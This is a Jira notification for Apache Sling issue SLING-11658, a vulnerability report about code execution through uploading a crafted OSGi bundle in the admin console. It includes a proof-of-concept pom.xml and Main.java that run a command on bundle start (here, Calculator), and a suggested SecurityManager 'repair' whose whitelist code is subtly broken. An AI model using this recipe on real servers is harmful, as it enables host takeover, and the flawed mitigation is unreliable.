[
https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
QSec-Team closed SLING-11658.
-----------------------------
> sling remote code execute
> -------------------------
>
> Key: SLING-11658
> URL: https://issues.apache.org/jira/browse/SLING-11658
> Project: Sling
> Issue Type: Bug
> Components: Console
> Affects Versions: App CMS 1.1.2
> Environment: OpenJDK Runtime Environment (Zulu
> 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
> Reporter: QSec-Team
> Priority: Major
> Attachments: 1.png, 2.png
>
>
> h1. Utilization process
>
> After Sling logs in,Osgi management function,You can obtain host control by
> uploading the bundle component package.
> !1.png!
>
> After uploading the malicious bundle package constructed by the
> attacker,First click the "Refresh Package Imports" button, and then click the
> "start" button,This will trigger the bundle group price loading, and the
> malicious code will be executed.
> !2.png!
>
> h1. Jar package construction:
>
> Create a new Maven project and add the following compilation options in
> pom.xml:
> {code:java}
> <build>
> <plugins>
> <plugin>
> <groupId>org.apache.maven.plugins</groupId>
> <artifactId>maven-assembly-plugin</artifactId>
> <configuration>
> <descriptorRefs>
> <descriptorRef>jar-with-dependencies</descriptorRef>
> </descriptorRefs>
> <archive>
> <manifestEntries>
> <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
> <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
> <Bundle-Version>6.6.6</Bundle-Version>
> </manifestEntries>
> </archive>
> </configuration>
> </plugin>
> </plugins>
> </build> {code}
> Create Main.java in the source code folder:
> Note the "package jsx. ink;" in the source code It should correspond to the
> Bundle Activator attribute in pom.xml.
> {code:java}
> package jsx.ink;
> public class Main {
> static {
> try {
>
> Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
> } catch (Exception e) {
> }
> }
> public static void main(String[] args) { System.out.println("Hello
> world!");
> }
> } {code}
> After the code is written, enter the directory where pom.xml is located and
> use the maven command to package:
> {code:java}
> mvn assembly:assembly -f pom.xml {code}
> h1.
> h1. Repair
>
> You can use securityManager to restrict some operations.
> {code:java}
> SecurityManager securityManager = new SecurityManager() {
> @Override
> public void checkExec(String cmd) {
> List<String> whiteList = Arrays.asList("whoami,netstat");
> if (!whiteList.contains(cmd)) {
> throw new RuntimeException("command execute denied!");
> }
> super.checkExec(cmd);
> }
> };
> System.setSecurityManager(securityManager); {code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
